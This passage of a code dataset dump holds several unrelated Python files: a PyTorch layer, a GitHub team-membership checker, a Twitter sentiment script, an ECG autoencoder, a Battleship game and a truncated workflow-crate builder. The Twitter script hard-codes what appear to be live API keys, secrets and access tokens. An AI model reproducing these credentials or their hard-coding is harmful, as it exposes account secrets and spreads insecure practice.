}","sub_path":"finrl/env/accounting/ledger.py","file_name":"ledger.py","file_ext":"py","file_size_in_byte":9357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"539519676","text":"\"\"\"\nBSD 3-Clause License\n\nCopyright (c) Soumith Chintala 2016,\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without\nmodification, are permitted provided that the following conditions are met:\n\n* Redistributions of source code must retain the above copyright notice, this\n list of conditions and the following disclaimer.\n\n* Redistributions in binary form must reproduce the above copyright notice,\n this list of conditions and the following disclaimer in the documentation\n and/or other materials provided with the distribution.\n\n* Neither the name of the copyright holder nor the names of its\n contributors may be used to endorse or promote products derived from\n this software without specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\nDISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n\nCopyright 2020 Huawei Technologies Co., Ltd\n\nLicensed under the BSD 3-Clause License (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\nhttps://spdx.org/licenses/BSD-3-Clause.html\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\nimport torch.nn as nn\nfrom .conv_bn_act import ConvBnAct\nfrom .create_conv2d import create_conv2d\n\n\nclass Involution(nn.Module):\n\n def __init__(\n self,\n channels,\n kernel_size=3,\n stride=1,\n group_size=16,\n rd_ratio=4,\n norm_layer=nn.BatchNorm2d,\n act_layer=nn.ReLU,\n ):\n super(Involution, self).__init__()\n self.kernel_size = kernel_size\n self.stride = stride\n self.channels = channels\n self.group_size = group_size\n self.groups = self.channels // self.group_size\n self.conv1 = ConvBnAct(\n in_channels=channels,\n out_channels=channels // rd_ratio,\n kernel_size=1,\n norm_layer=norm_layer,\n act_layer=act_layer)\n self.conv2 = self.conv = create_conv2d(\n in_channels=channels // rd_ratio,\n out_channels=kernel_size**2 * self.groups,\n kernel_size=1,\n stride=1)\n self.avgpool = nn.AvgPool2d(stride, stride) if stride == 2 else nn.Identity()\n self.unfold = nn.Unfold(kernel_size, 1, (kernel_size-1)//2, stride)\n\n def forward(self, x):\n weight = self.conv2(self.conv1(self.avgpool(x)))\n B, C, H, W = weight.shape\n KK = int(self.kernel_size ** 2)\n weight = weight.view(B, self.groups, KK, H, W).unsqueeze(2)\n out = self.unfold(x).view(B, self.groups, self.group_size, KK, H, W)\n out = (weight * out).sum(dim=3).view(B, self.channels, H, W)\n return out\n","sub_path":"PyTorch/contrib/cv/classification/Vit_small_patch16_224/timm/models/layers/involution.py","file_name":"involution.py","file_ext":"py","file_size_in_byte":3645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"367114655","text":"\n\n#class header\nclass _PUZZLE():\n\tdef __init__(self,): \n\t\tself.name = \"PUZZLE\"\n\t\tself.definitions = [u'a situation that is difficult to understand: ', u'a game or toy in which you have to fit separate pieces together, or a problem or question that you have to answer by using your skill or knowledge: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_puzzle.py","file_name":"_puzzle.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"143943279","text":"import requests\nimport os\nimport json\n\norganization = \"fuchicorp\"\ntoken = 
os.environ.get(\"GIT_TOKEN\")\n\n\ndef find_team_id(team_name):\n teams_url= f\"https://api.github.com/orgs/{organization}/teams\"\n resp = requests.get(url=teams_url, headers={\"Authorization\": f\"token {token}\"})\n if resp.status_code == 200:\n for team in resp.json():\n if team['name'].lower() == team_name.lower():\n return team['id']\n else:\n return None\n\ndef is_user_member(username):\n team_id = find_team_id(\"academy-students\")\n if team_id is not None:\n team_url = f\"https://api.github.com/teams/{team_id}/members\"\n resp = requests.get(url=team_url, headers={\"Authorization\": f\"token {token}\"})\n if resp.status_code == 200:\n for user in resp.json():\n if user['login'].lower() == username.lower():\n return True\n else:\n return False\n\n\nif __name__ == '__main__':\n print(find_team_id(\"academy-students\"))\n if is_user_member(\"beamsoul\"):\n print(\"Yes this user is in the system\")\n else:\n print(\"This user is not in the list\")","sub_path":"github-management/get-list-of-users.py","file_name":"get-list-of-users.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"393953463","text":"from searchtweets import load_credentials\nfrom searchtweets import collect_results\nfrom searchtweets import gen_rule_payload\n\nfrom textblob import TextBlob\nimport yaml\nimport pandas as pd\nimport re\nimport numpy as np\nimport tweepy\n#from GUI import text\n\ndef rating(avg):\n if avg <= -5:\n return \"Very Bad Movie\"\n elif -5 < avg <= 0:\n return \"Poor Movie\"\n elif 0 < avg <= 5:\n return \"Decent Movie\"\n else:\n return \"Great Movie\"\n\ndef clean_text(text):\n text = re.sub(r'@[A-Za-z0-9]+', '', text) # Removing @ mentions\n text = re.sub(r'#', '', text) # Removing '#'\n text = re.sub(r'RT[\\s]+', '', text) # Removing retweet symbols\n text = re.sub(r'https?:\\/\\/\\S+', '', text) # Removing hyper links\n return text\n\ndef Polarity(text):\n return TextBlob(text).sentiment.polarity\n\nauth = tweepy.OAuthHandler('JUBWToPuyPfmzg8n117ZTllfB', 'lt0Psg46Nqzzaa4uel3wtSbaOyh9WiYIqx6ZH5xaExthndrsc1')\nauth.set_access_token('1172272055183728640-nLQg9fvsLVieB9BXSsJq86a6kMmR8p', '5ogC7PXA1nmlNd5FCYtNaSIhF7tyA5K7CZzNBhi8qIhv1')\n\napi = tweepy.API(auth)\n\ntry:\n api.verify_credentials()\n print(\"Authentication OK\")\n\nexcept:\n print(\"Error during authentication\")\n\nconfig = dict(\n search_tweets_api = dict(\n account_type = 'premium',\n endpoint = 'https://api.twitter.com/1.1/tweets/search/fullarchive/dev.json',\n consumer_key = 'JUBWToPuyPfmzg8n117ZTllfB',\n consumer_secret = 'lt0Psg46Nqzzaa4uel3wtSbaOyh9WiYIqx6ZH5xaExthndrsc1'\n )\n )\n\npremium_search_args = load_credentials(\"twitter_keys_fullarchive.yaml\",\n yaml_key=\"search_tweets_api\",\n env_overwrite=False)\n\n\n#query = \"If this were green KSI\"\nquery = \"Apocalytpo\"\nrule = gen_rule_payload(query, from_date=\"2017-09-01\", to_date=\"2020-07-26\", results_per_call=100)\ntweets = collect_results(rule,\n max_results=100,\n result_stream_args=premium_search_args)\n\n# lists that will become columns in our data frame\nuser_list = []\nclean_list = []\nfavorited_list = []\nretweet_list = []\nits_a_retweet = []\n\nfor tweet in tweets:\n tw_obj = api.get_status(tweet.id)\n if not hasattr(tw_obj, 'retweeted_status'):\n user_list.append(tw_obj.user.screen_name)\n cleaned = clean_text(tweet.text)\n clean_list.append(cleaned)\n favorited_list.append(tweet.favorite_count)\n retweet_list.append(tweet.retweet_count)\n\n# creating the 
data frame\n# To make a column, you need a list\ndf = pd.DataFrame(user_list)\ndf['Tweet Text'] = clean_list\ndf['Number of Favorites'] = favorited_list\ndf['Number of Retweets'] = retweet_list\ndf['Polarity'] = df['Tweet Text'].apply(Polarity)\n\n# sort data frame by polarity\nsortedDF = df.sort_values(by=['Polarity'], ignore_index=True, ascending=False)\n\n# sort data frame by favorites\nsortedFavDF = df.sort_values(by=['Number of Favorites'], ignore_index=True, ascending=False)\n\n # gathering polarity data from df\npol_count = 0.0\nfor i in df.index:\n pol_count += df['Polarity'][i] * df['Number of Favorites'][i] + df['Polarity'][i] * 2.0 * df['Number of Retweets'][i]\n pol_count += df['Polarity'][i]\n avg_pol = float(pol_count/50.0)\n\nprint(\"Average Polarity: \", avg_pol)\nprint(\"Overall Rating: \", rating(avg_pol), '\\n')\n\n# 5 Most Popular Tweets\nprint(\"5 most popular tweets: \")\nfor i in range(0, 5):\n print(str(i + 1) + \") \" + sortedFavDF['Tweet Text'][i] + \". Number of Favorites: \", sortedFavDF['Number of Favorites'][i])\n\n# 5 Most Positive Tweets\nprint(\"\\n5 Most Positive Tweets: \")\nfor i in range(0, 5):\n print(str(i + 1) + \") \" + sortedDF['Tweet Text'][i] + \". Polarity: \", sortedFavDF['Polarity'][i])\n\nprint(\"\\n5 Most Negative Tweets: \")\nj = 1\nfor i in range(df['Tweet Text'].size, df['Tweet Text'].size - 5, -1):\n print(str(j) + \") \" + sortedDF['Tweet Text'][i - 1] + \". Polarity: \", sortedFavDF['Polarity'][i - 1])\n j += 1\n\n\n\n\n\n\n\n","sub_path":"rate.py","file_name":"rate.py","file_ext":"py","file_size_in_byte":3886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"512620769","text":"#41 A - Shrinking\nimport collections \ns = list(input())\ncnt = collections.Counter(s)\nvalcnt = list(cnt.values())\nM = max(valcnt)\n# list of the characters with the highest occurrence count\nmkeys = [i for i,v in cnt.items() if v == M]\n\nans = len(s)\nfor key in s:\n m = 0\n cnt = 0\n # the maximum interval between occurrences of a character is that character's minimum\n for S in s:\n if S == key: \n m = max(m,cnt)\n cnt = 0\n else:\n cnt += 1\n m = max(m,cnt)\n ans = min(ans,m)\nans = min(ans,len(s)//2)\nprint(ans)","sub_path":"Python_codes/p03687/s771482377.py","file_name":"s771482377.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"403540809","text":"from __future__ import print_function\nimport torch\nimport torch.utils.data\nimport numpy as np\nimport wfdb\nimport os\n\nfrom torch import nn, optim\nfrom torch.utils.data.dataset import Dataset\nfrom torch.optim.lr_scheduler import ReduceLROnPlateau\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import MinMaxScaler\n\nis_cuda = True\nepochs_num = 100\nbatch_size = 32\ntorch.manual_seed(46)\nlog_interval = 10\nin_channels_ = 1\nnum_segments_in_record = 100\nsegment_len = 2000\nnum_records = 48\nallow_label_leakage = True\n\ndevice = torch.device(\"cuda:2\" if is_cuda else \"cpu\")\nindex_set = (num_records * num_segments_in_record if allow_label_leakage else num_records)\ntrain_ids, test_ids = train_test_split(np.arange(index_set), train_size=.8, random_state=46)\nscaler = MinMaxScaler(feature_range=(0, 1), copy=False)\n\n\nclass CustomDatasetFromCSV(Dataset):\n def __init__(self, data_path, seg_ids, transforms_=None):\n arr_db = wfdb.get_record_list('mitdb')\n sig_list = []\n seg_ids_internal = []\n if not allow_label_leakage:\n seg_ids_internal = [arr_db[idx] for idx in seg_ids] # get the real id of the record\n for _, 
record in enumerate(arr_db):\n if (not allow_label_leakage) & (record not in seg_ids_internal): continue\n record_path = os.path.join(data_path, str(record))\n record_signal = wfdb.rdsamp(record_path, sampto=num_segments_in_record * segment_len)[0][:, 0]\n sig_list.append(record_signal.reshape([num_segments_in_record, segment_len]))\n signals = np.vstack(sig_list)\n signals = scaler.fit_transform(signals.T).T.reshape([-1, 1, segment_len])\n if allow_label_leakage:\n signals = signals[seg_ids]\n self.signals = signals\n self.transforms = transforms_\n\n def __getitem__(self, index):\n\n signal = self.signals[index]\n if self.transforms is not None:\n signal = self.transforms(signal)\n\n return signal\n\n def __len__(self):\n return self.signals.shape[0]\n\n\ntrain_dataset = CustomDatasetFromCSV('./data/mit-bih-arrhythmia-database-1.0.0', seg_ids=train_ids)\ntrain_loader = torch.utils.data.DataLoader(dataset=train_dataset, batch_size=batch_size, shuffle=False)\ntest_dataset = CustomDatasetFromCSV('./data/mit-bih-arrhythmia-database-1.0.0', seg_ids=test_ids)\ntest_loader = torch.utils.data.DataLoader(dataset=test_dataset, batch_size=batch_size, shuffle=False)\n\n\ndef GenerateLR(max_lr, min_lr_ratio, anneal_cycle_pct, tot_num_iter):\n min_lr = max_lr / min_lr_ratio\n half_cyc_len = int((np.floor(100 - anneal_cycle_pct) / 100) * tot_num_iter / 2)\n anneal_len = int(tot_num_iter - 2 * half_cyc_len)\n upVec = np.linspace(min_lr, max_lr, half_cyc_len)\n downVec = np.flip(upVec)\n annealVec = np.flip(np.linspace(min_lr / 100, min_lr, anneal_len))\n cyclic_lr = (upVec.tolist()) + (downVec.tolist()) + (annealVec.tolist())\n return cyclic_lr\n\n\nclass Interpolate(nn.Module):\n def __init__(self, scale_factor=2, mode='nearest'):\n super(Interpolate, self).__init__()\n self.interp = nn.functional.interpolate\n self.scale_factor = scale_factor\n self.mode = mode\n\n def forward(self, x):\n x = self.interp(x, scale_factor=self.scale_factor, mode=self.mode, align_corners=None)\n return x\n\n\nclass Flatten(torch.nn.Module):\n def forward(self, x):\n batch_size = x.shape[0]\n return x.view(batch_size, -1)\n\n\ndef basic_layer(in_channels, out_channels, kernel_size, batch_norm=False, max_pool=True, stride=1, padding=0):\n layer = nn.Sequential(\n nn.Conv1d(in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size, stride=stride,\n padding=padding),\n nn.ReLU())\n if batch_norm:\n layer = nn.Sequential(\n layer,\n nn.BatchNorm1d(num_features=out_channels))\n if max_pool:\n layer = nn.Sequential(\n layer,\n nn.MaxPool1d(kernel_size=2, stride=2))\n\n return layer\n\n\ndef basic_layer2(in_channels, out_channels, kernel_size, batch_norm=False, max_pool=True, stride=1, padding=0):\n layer = nn.Sequential(\n nn.Conv1d(in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size, stride=stride,\n padding=padding),\n nn.ReLU())\n if batch_norm:\n layer = nn.Sequential(\n layer,\n nn.BatchNorm1d(num_features=out_channels))\n if max_pool:\n layer = nn.Sequential(\n layer,\n nn.MaxPool1d(kernel_size=2, stride=1))\n\n return layer\n\n\nclass CAE(nn.Module):\n def __init__(self, in_channels=in_channels_):\n super(CAE, self).__init__()\n self.encoder = nn.Sequential(\n basic_layer(in_channels=in_channels, out_channels=8, kernel_size=3, batch_norm=False, max_pool=True,\n padding=1),\n basic_layer(in_channels=8, out_channels=32, kernel_size=5, batch_norm=True, max_pool=True, padding=2),\n basic_layer(in_channels=32, out_channels=16, kernel_size=3, batch_norm=True, max_pool=True, 
padding=1),\n basic_layer(in_channels=16, out_channels=64, kernel_size=11, batch_norm=False, max_pool=False, padding=5),\n basic_layer(in_channels=64, out_channels=128, kernel_size=13, batch_norm=False, max_pool=True, padding=6),\n nn.Dropout(p=.22),\n basic_layer(in_channels=128, out_channels=32, kernel_size=3, batch_norm=False, max_pool=False, padding=1),\n basic_layer(in_channels=32, out_channels=1, kernel_size=7, batch_norm=False, max_pool=True, padding=3),\n nn.Dropout(p=.22)\n )\n\n self.us_decoder = nn.Sequential(\n basic_layer(in_channels=1, out_channels=1, kernel_size=7, batch_norm=False, max_pool=False, padding=3),\n basic_layer(in_channels=1, out_channels=32, kernel_size=3, batch_norm=False, max_pool=False, padding=1),\n Interpolate(scale_factor=2),\n basic_layer(in_channels=32, out_channels=128, kernel_size=13, batch_norm=False, max_pool=False, padding=6),\n basic_layer(in_channels=128, out_channels=64, kernel_size=11, batch_norm=False, max_pool=False, padding=5),\n\n Interpolate(scale_factor=2),\n basic_layer(in_channels=64, out_channels=16, kernel_size=3, batch_norm=False, max_pool=False, padding=1),\n basic_layer(in_channels=16, out_channels=32, kernel_size=5, batch_norm=False, max_pool=False, padding=2),\n Interpolate(scale_factor=2),\n basic_layer(in_channels=32, out_channels=32, kernel_size=3, batch_norm=False, max_pool=False, padding=1),\n Interpolate(scale_factor=2),\n basic_layer(in_channels=32, out_channels=8, kernel_size=3, batch_norm=False, max_pool=False, padding=1),\n Flatten(),\n nn.Linear(in_features=8 * 992, out_features=segment_len),\n nn.Sigmoid(),\n )\n\n self.ex_decoder = nn.Sequential()\n self.aggr_decoder = nn.Sequential()\n\n def encode(self, x):\n y = self.encoder(x)\n return y\n\n def decode(self, z):\n return self.us_decoder(z)\n\n def forward(self, x, ex_features=None):\n encoded = self.encode(x)\n us_decoded = self.us_decoder(encoded)\n # ex_decoded = self.ex_decoder(ex_features)\n # aggr_rep = torch.cat([ex_decoded.to(device), us_decoded], dim=1)\n # z = self.aggr_decoder(aggr_rep)\n return us_decoded\n\n\ndef calc_next_len_conv1d(current_len=112500, kernel_size=16, stride=8, padding=0, dilation=1):\n return int(np.floor((current_len + 2 * padding - dilation * (kernel_size - 1) - 1) / stride + 1))\n\n\nmodel = CAE().to(device).double()\n# best at lr=0.0005, weight_decay=1e-5 factor=0.5, patience=5\nlr = 0.0003\nnum_of_iteration = len(train_dataset) // batch_size\n\noptimizer = optim.Adam(model.parameters(), lr=lr, weight_decay=1e-6)\nscheduler = ReduceLROnPlateau(optimizer, factor=0.5, patience=3)\ncriterion = nn.MSELoss()\ncyclic_lr = GenerateLR(max_lr=lr, min_lr_ratio=10, anneal_cycle_pct=10,\n tot_num_iter=(epochs_num * num_of_iteration))\n\n\ndef train(epoch):\n model.train()\n train_loss = 0\n for batch_idx, data in enumerate(train_loader):\n data = data.to(device)\n if len(cyclic_lr) > 0:\n lr = cyclic_lr.pop(0)\n for g in optimizer.param_groups:\n g['lr'] = lr\n optimizer.zero_grad()\n # features = np.random.randn(batch_size, 40)\n recon_batch = model(data)\n loss = criterion(recon_batch, data.view(recon_batch.shape[0], -1))\n loss.backward()\n train_loss += loss.item()\n optimizer.step()\n if batch_idx % log_interval == 0:\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n epoch, batch_idx * len(data), len(train_loader.dataset),\n 100. 
* batch_idx / len(train_loader),\n loss.item() / len(data)))\n\n print('====> Epoch: {} Average loss: {:.4f}'.format(\n epoch, train_loss / len(train_loader.dataset)))\n\n\ndef test(epoch):\n model.eval()\n test_loss = 0\n with torch.no_grad():\n for batch_idx, data in enumerate(test_loader):\n data = data.to(device)\n recon_batch = model(data)\n loss = criterion(recon_batch, data.view(recon_batch.shape[0], -1))\n test_loss += loss.item()\n # import matplotlib.pyplot as plt\n # plt.plot(np.squeeze(data[0, :, :].cpu().detach().numpy()))\n # plt.plot(np.squeeze(recon_batch[0, :].cpu().detach().numpy()))\n\n if batch_idx == 0:\n n = min(data.size(0), 4)\n\n test_loss /= len(test_loader.dataset)\n print('====> Test set loss: {:.5f}'.format(test_loss))\n # scheduler.step(test_loss)\n print(f'Learning rate: {optimizer.param_groups[0][\"lr\"]:.6f}')\n\n\nif __name__ == \"__main__\":\n for epoch in range(1, epochs_num + 1):\n train(epoch)\n test(epoch)\n","sub_path":"CAE-MIT-BIH.py","file_name":"CAE-MIT-BIH.py","file_ext":"py","file_size_in_byte":10028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"5510364","text":"#Skeleton Program for the AQA AS1 Summer 2016 examination\n#this code should be used in conjunction with the Preliminary Material\n#written by the AQA AS1 Programmer Team\n#developed in a Python 3 programming environment\n\n#Version Number 1.0\n\nimport pickle\nimport random\n\nShipDict = {}\nHardMode = False\nscore = 0\nTurnTaken = False\n\ndef CheckShips(Board):\n NewShipDict = {}\n for ship in ['A', 'B', 'S', 'D', 'P']:\n NewShipDict[ship] = CheckShip(Board, ship)\n return NewShipDict\n\ndef CheckShip(Board, ship):\n for Row in range(10):\n for Column in range(10):\n if Board[Row][Column] == ship:\n return True\n\ndef DisplayHighScores(Scores):\n sortedScores = sorted(Scores, key = Scores.get)\n print()\n print(\"---HIGH SCORES---\")\n for name in sortedScores:\n print('{} : {}'.format(name, Scores[name]))\n\ndef LoadScores():\n global Scores\n File = open('SavedScores.txt', 'rb')\n Scores = pickle.loads(File.read())\n File.close()\n return Scores\n\ndef SaveScores(score, Scores):\n playerName = input(\"What is your name?: \")\n Scores[playerName] = score\n File = open('SavedScores.txt', 'wb')\n pickle.dump(Scores, File)\n File.close()\n\ndef GetRowColumn():\n print()\n Column = int(input(\"Please enter column: \"))\n Row = int(input(\"Please enter row: \"))\n print()\n return Row, Column\n\ndef MakePlayerMove(Board, Ships):\n global TurnTaken\n Row, Column = GetRowColumn()\n if Board[Row][Column] == \"m\" or Board[Row][Column] == \"h\":\n print(\"Sorry, you have already shot at the square (\" + str(Column) + \",\" + str(Row) + \"). 
Please try again.\")\n elif Board[Row][Column] == \"-\":\n print(\"Sorry, (\" + str(Column) + \",\" + str(Row) + \") is a miss.\")\n Board[Row][Column] = \"m\"\n TurnTaken = True\n else:\n print(\"Hit at (\" + str(Column) + \",\" + str(Row) + \").\")\n Board[Row][Column] = \"h\"\n TurnTaken = True\n\ndef SetUpBoard():\n Board = []\n for Row in range(10):\n BoardRow = []\n for Column in range(10):\n BoardRow.append(\"-\")\n Board.append(BoardRow)\n return Board\n\ndef LoadGame(Filename, Board):\n global ShipDict\n BoardFile = open(Filename, \"r\")\n for Row in range(10):\n Line = BoardFile.readline()\n for Column in range(10):\n Board[Row][Column] = Line[Column]\n ShipDict = {'A' : True,\n 'B': True,\n 'S' : True,\n 'D' : True,\n 'P': True}\n BoardFile.close()\n\ndef PlaceRandomShips(Board, Ships):\n for Ship in Ships:\n Valid = False\n while not Valid:\n Row = random.randint(0, 9)\n Column = random.randint(0, 9)\n HorV = random.randint(0, 3)\n if HorV == 0:\n Orientation = \"v\"\n elif HorV == 1:\n Orientation = \"h\"\n elif HorV == 2:\n Orientation = \"d\"\n elif HorV == 3:\n Orientation = \"bd\"\n Valid = ValidateBoatPosition(Board, Ship, Row, Column, Orientation)\n print(\"Computer placing the \" + Ship[0])\n PlaceShip(Board, Ship, Row, Column, Orientation)\n\ndef PlaceShip(Board, Ship, Row, Column, Orientation):\n if Orientation == \"v\":\n for Scan in range(Ship[1]):\n Board[Row + Scan][Column] = Ship[0][0]\n elif Orientation == \"h\":\n for Scan in range(Ship[1]):\n Board[Row][Column + Scan] = Ship[0][0]\n elif Orientation == \"d\":\n for Scan in range(Ship[1]):\n Board[Row + Scan][Column + Scan] = Ship[0][0]\n elif Orientation == \"bd\":\n for Scan in range(Ship[1]):\n Board[Row + Scan][Column - Scan] = Ship[0][0]\n\ndef ValidateBoatPosition(Board, Ship, Row, Column, Orientation):\n if Orientation == \"v\" and Row + Ship[1] > 10:\n return False\n elif Orientation == \"h\" and Column + Ship[1] > 10:\n return False\n elif Orientation == \"d\" and (Column + Ship[1] > 10 or Row + Ship[1] > 10):\n return False\n elif Orientation == \"bd\" and (Column - Ship[1] < 1 or Row + Ship[1] > 10):\n return False\n else:\n if Orientation == \"v\":\n for Scan in range(Ship[1]):\n if Board[Row + Scan][Column] != \"-\":\n return False\n elif Orientation == \"h\":\n for Scan in range(Ship[1]):\n if Board[Row][Column + Scan] != \"-\":\n return False\n elif Orientation == \"d\":\n for Scan in range(Ship[1]):\n if Board[Row + Scan][Column + Scan] != \"-\":\n return False\n elif Orientation == \"bd\":\n for Scan in range(Ship[1]):\n if Board[Row + Scan][Column - Scan] != \"-\":\n return False\n return True\n\ndef CheckWin(Board):\n for Row in range(10):\n for Column in range(10):\n if Board[Row][Column] in [\"A\",\"B\",\"S\",\"D\",\"P\"]:\n return False\n return True\n\ndef PrintBoard(Board):\n print()\n print(\"The board looks like this: \")\n print()\n print(\" \", end=\"\")\n for Column in range(10):\n print(\" \" + str(Column) + \" \", end=\"\")\n print()\n for Row in range(10):\n print (str(Row) + \" \", end=\"\")\n for Column in range(10):\n if Board[Row][Column] == \"-\":\n print(\" \", end=\"\")\n elif Board[Row][Column] in [\"A\",\"B\",\"S\",\"D\",\"P\"]:\n print(\" \", end=\"\")\n else:\n print(Board[Row][Column], end=\"\")\n if Column != 9:\n print(\" | \", end=\"\")\n print()\n\ndef DisplayMenu():\n print(\"MAIN MENU\")\n print()\n print(\"1. Start new game\")\n print(\"2. Load training game\")\n print(\"3. Toggle Hard Mode\")\n print(\"9. 
Quit\")\n print()\n\ndef GetMainMenuChoice():\n print(\"Please enter your choice: \", end=\"\")\n Choice = int(input())\n print()\n return Choice\n\ndef PlayGame(Board, Ships):\n global ShipDict\n global score\n global TurnTaken\n GameWon = False\n while not GameWon:\n TurnTaken = False\n PrintBoard(Board)\n MakePlayerMove(Board, Ships)\n NewShipDict = CheckShips(Board)\n for ship in ['A', 'B', 'S', 'D', 'P']:\n if ShipDict[ship] != NewShipDict[ship]:\n print(\"You destroyed the\", ship, \"ship!\")\n ShipDict = NewShipDict\n GameWon = CheckWin(Board)\n if score > 45 and HardMode:\n GameWon = True\n print('You ran out of ammo!')\n if TurnTaken:\n score += 1\n if GameWon:\n print(\"All ships sunk!\")\n Scores = LoadScores()\n SaveScores(score, Scores)\n DisplayHighScores(Scores)\n print()\n\nif __name__ == \"__main__\":\n TRAININGGAME = \"Training.txt\"\n MenuOption = 0\n while not MenuOption == 9:\n Board = SetUpBoard()\n Ships = [[\"Aircraft Carrier\", 5], [\"Battleship\", 4], [\"Submarine\", 3], [\"Destroyer\", 3], [\"Patrol Boat\", 2]]\n DisplayMenu()\n MenuOption = GetMainMenuChoice()\n if MenuOption == 1:\n PlaceRandomShips(Board, Ships)\n PlayGame(Board,Ships)\n if MenuOption == 2:\n LoadGame(TRAININGGAME, Board)\n PlayGame(Board, Ships)\n if MenuOption == 3:\n if HardMode:\n print(\"Hard Mode Off\\n\")\n HardMode = False\n elif not HardMode:\n print(\"Hard Mode On. You now only have 45 ammo\\n\")\n HardMode = True","sub_path":"WARSHIPS/WarshipsMain.py","file_name":"WarshipsMain.py","file_ext":"py","file_size_in_byte":6739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"551397883","text":"#!/usr/bin/env python\n\n## Copyright 2019-2020 The University of Manchester, UK\n##\n## Licensed under the Apache License, Version 2.0 (the \"License\");\n## you may not use this file except in compliance with the License.\n## You may obtain a copy of the License at\n##\n## http://www.apache.org/licenses/LICENSE-2.0\n##\n## Unless required by applicable law or agreed to in writing, software\n## distributed under the License is distributed on an \"AS IS\" BASIS,\n## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n## See the License for the specific language governing permissions and\n## limitations under the License.\n\nimport io\nimport json\nimport os\nimport tempfile\nfrom contextlib import redirect_stdout\n\nimport rocrate.rocrate as roc\n\nfrom rocrate.model import entity\nfrom galaxy2cwl import get_cwl_interface\n\ndef make_workflow_rocrate(workflow_path,wf_type,include_files=[],fetch_remote=False,cwl=None,diagram=None):\n\n # Properties \n # missing? \n # input\n # output\n # programmingLanguage\n # url\n #version\n # sdPublisher - current set to the person that provided the metadata, decision to change to the Workflow Hub itself - Done\n\n # publisher - where it came came from, e.g. 
Galaxy, github, or WF Hub if uploaded - Done\n\n # producer - to describe the Project or Team Done\n\n # creator - the creators/ authors Done\n\n # maintainer - new recommended property to describe the uploader + additional people with manage rights Done\n\n # funder - example of cordis reference - https://cordis.europa.eu/project/id/730976\n # https://schema.org/FundingScheme linked to funder\n # Examples at the bottom of https://schema.org/Grant - funding looks ideal but not currently legal\n # Is needed to fulfill the OpenAire “Funding Reference” property\n\n # datePublished - becomes an optional property, and we use the date a DOI was minted (this property is needed for dataCite) Done\n\n # creativeWorkStatus - Maturity level, to be added to BioSchemas Done\n\n # Identifier - can be DOI if this function is enabled in WorkflowHub Done\n\n #returns a complete ROCrate object corresponding to a Workflow template file\n # wf_type: Galaxy, CWL , Nextflow..\n # cwl: CWL/CWL-Abstract representation of the workflow. If the\n # diagram: an image/graphical workflow representation.\n # If a CWL/CWLAbstract file is provided then this is generated using cwltool\n #abs_path = os.path.abspath(workflow_path)\n wf_crate = roc.ROCrate()\n # add main workflow file\n file_name = os.path.basename(workflow_path)\n wf_file = wf_crate.add_file(workflow_path,file_name) # should I add it in a special path within the crate?\n wf_crate.set_main_entity(wf_file)\n if wf_type == 'CWL':\n programming_language_entity = entity.Entity(wf_crate,'https://www.commonwl.org/v1.1/', properties={\"@type\": [\"ComputerLanguage\", \"SoftwareApplication\"], 'name':'CWL', 'url':'https://www.commonwl.org/v1.1/', 'version':'1.1'})\n if wf_type == 'Galaxy':\n if not cwl:\n #create cwl_abstract\n with tempfile.NamedTemporaryFile(mode='w', delete=False) as cwl_abstract_out:\n with redirect_stdout(cwl_abstract_out):\n get_cwl_interface.main(['1',workflow_path])\n wf_file = wf_crate.add_file(cwl_abstract_out.name, 'abstract_wf.cwl', properties={\"@type\": [\"ComputerLanguage\", \"SoftwareApplication\"]})\n programming_language_entity = entity.Entity(wf_crate,'https://galaxyproject.org/')\n\n ### SET PROPERTIES\n # A contextual entity representing a SoftwareApplication or ComputerLanguage MUST have a name, url and version,\n # which should indicate a known version the workflow/script was developed or tested with\n if programming_language_entity:\n 